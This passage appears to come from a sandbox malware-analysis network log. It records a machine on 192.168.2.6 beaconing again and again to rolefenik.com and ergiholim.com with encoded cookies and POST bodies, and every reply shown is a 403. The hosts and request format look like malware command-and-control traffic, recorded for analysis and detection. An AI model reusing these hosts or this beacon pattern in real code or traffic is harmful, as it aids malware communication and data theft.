                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:57 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:57 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:57 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6pYaYF214rnQtg64g8L6p6AL9LspkjxnVvl%2FId2AYBLSJKWi1rxSX2LydKU2wcH%2FAmVntqpdHvWcQlbcycetsatnHuovII783CcJR6KbhyFFEHacZ%2BzitzPNyBDLVMC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072636a6bc979-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=33447&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=86626&cwnd=32&unsent_bytes=0&cid=da1362e8537745c5&ts=286&x=0"
                                                                                                                                          2024-11-13 17:22:57 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          54 | 192.168.2.6 | 50047 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:58 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:58 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:59 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:59 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGHHpDIDBXY2ts8C6KRtMUd%2FdgBdVjj%2BDKak8YTJ1m77jf7JQm82kt0wP7Rftyn6Ymu0toZMQo6YMFKYs6Ux2Z3i90PCwHVCdmYMT8W89Wp6UHAmfpPE6nCTCN4dJe57"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20726efa546b06-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1313&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2360228&cwnd=236&unsent_bytes=0&cid=6e26bb5a99c475d5&ts=1426&x=0"
                                                                                                                                          2024-11-13 17:22:59 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          55 | 192.168.2.6 | 50048 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:00 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:00 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:00 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:00 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53FK1MbVdP2exh9R30Zbk6wUIj0r9cdGiJEouY9XFL5YFoYuayPQEQL0%2FLNzqWzw72Zgu5iDF%2FzsHbFIk04nzdwXPVMZ%2BOFncGxuZnHtrCrDQRcNzUeFnZJz3fHaFz8n"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072779d65d744-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130818&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=22142&cwnd=32&unsent_bytes=0&cid=56f90b16cfacd2ba&ts=505&x=0"
                                                                                                                                          2024-11-13 17:23:00 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          56 | 192.168.2.6 | 50049 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:01 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:01 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:02 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:02 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sDwovdz1JJdMtieF51S4hW2OaKNbVPuLAZv1W8B6JSTPqDI9%2FrSNtPu2IaPoEqdX5ERzePuHxLiLxr1pv%2Fee9N%2BTFjwRZruV2KzxaDDkoYuYsaD39Mtsh9WOVOUebuY9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207281082f230e-SJC
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41539&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=69692&cwnd=32&unsent_bytes=0&cid=4f6311489d8c8a45&ts=649&x=0"
                                                                                                                                          2024-11-13 17:23:02 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          57 | 192.168.2.6 | 50050 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:03 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:03 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:03 UTC | 742 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8tFLPmqI799PnVeBOrq5G5ZXAMN6sjSzNTOcBhKuiHacpHIge4bmsDB7A6gBXEQ9I5TCD6VzQUzpKjQ23r2YwtumxUU5xw99TerBLalDxEsW1QvmHoUGFJQieEjbSOd7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20728b5edfd773-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137262&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=21077&cwnd=32&unsent_bytes=0&cid=0dc08ebf919023c0&ts=507&x=0"
                                                                                                                                          2024-11-13 17:23:03 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          58 | 192.168.2.6 | 50051 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:04 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:04 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:05 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:05 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nSy34c9HeRGYq1rso4OjG3DbafnyF3HcR4LJzS6%2B8EkflOWT1vQ2dPE1xON9f30KM0IzfEgx%2FN9sDiVeDEdii1NoYMzM3f0a%2Fw1toPlx9AVinICfYUm9EmcwwQkXE36"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072932fe9c991-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=33698&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=85843&cwnd=32&unsent_bytes=0&cid=242a4841e244cbd9&ts=379&x=0"
2024-11-13 17:23:05 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:05 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.2.6 | 50053 | 104.21.92.105 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:06 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:06 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:06 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:06 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugTmQJwoSTRLngQursOqTYXHNAD%2FbK3wnmoQwVwbfcW4W%2BQ9B0WoxujjHmJ4eg5tRu0HHaxBaXQ5u7oAS7veuAeSl%2BzgSREM22vjTQkjj5VHRnWm1ZplJXGUeZDLeg24"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20729d987ad754-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=142391&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18051&cwnd=32&unsent_bytes=0&cid=353bf2596d3dc2ed&ts=868&x=0"
2024-11-13 17:23:06 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:06 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.2.6 | 50054 | 104.21.15.162 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:07 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:07 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:08 UTC | 744 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:08 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtKpxvxrnx3yBfmjwSLQcAOLxc520cXHDYngWBt5NM8LaldTRbJXWrV5v1aRMWaaSCtHfBaAzZuSm96b9RnA3aJAfsNAANF1wMeBmdJHB5oxnbKRrI%2BUYWPnjNwYfPet"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072a68da0d788-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137469&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=21056&cwnd=32&unsent_bytes=0&cid=d54b3113894ee5f0&ts=550&x=0"
2024-11-13 17:23:08 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:08 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.2.6 | 50055 | 104.21.92.105 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:09 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:09 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:09 UTC | 745 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:09 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=acQqXazriKixtSRErgKXYHINiJgj84YMNHGkGFYHNJungNXei4EnEFzpSwIR6R9bTvyCoqoNNLXd6yE5eyqtlX%2FZLhwz0vrnKs%2Fu4ktygz8gWlbcfdc03yaxksnNVAqU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072adfc01c9ad-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=34535&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=83883&cwnd=32&unsent_bytes=0&cid=32c78d7787abab5b&ts=276&x=0"
2024-11-13 17:23:09 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:09 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.2.6 | 50056 | 104.21.15.162 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:10 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:10 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:10 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:10 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2FKxvvLq0z1pnKTbamai0hYAGNMx2URWKEW5LmRezYKImECxHMNyTXb%2BB7J5%2FwFx7Z%2BvzLkSNPhL6hdfM1xfIx32dWXoe8fUu%2B6vaIdT5yxgT0LifnIojDNCJ6TWAVG1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072b5dff8aff3-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=144356&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=17493&cwnd=32&unsent_bytes=0&cid=bfb7b3b6bc45a5b3&ts=626&x=0"
2024-11-13 17:23:10 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:10 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.2.6 | 50057 | 104.21.92.105 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:11 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
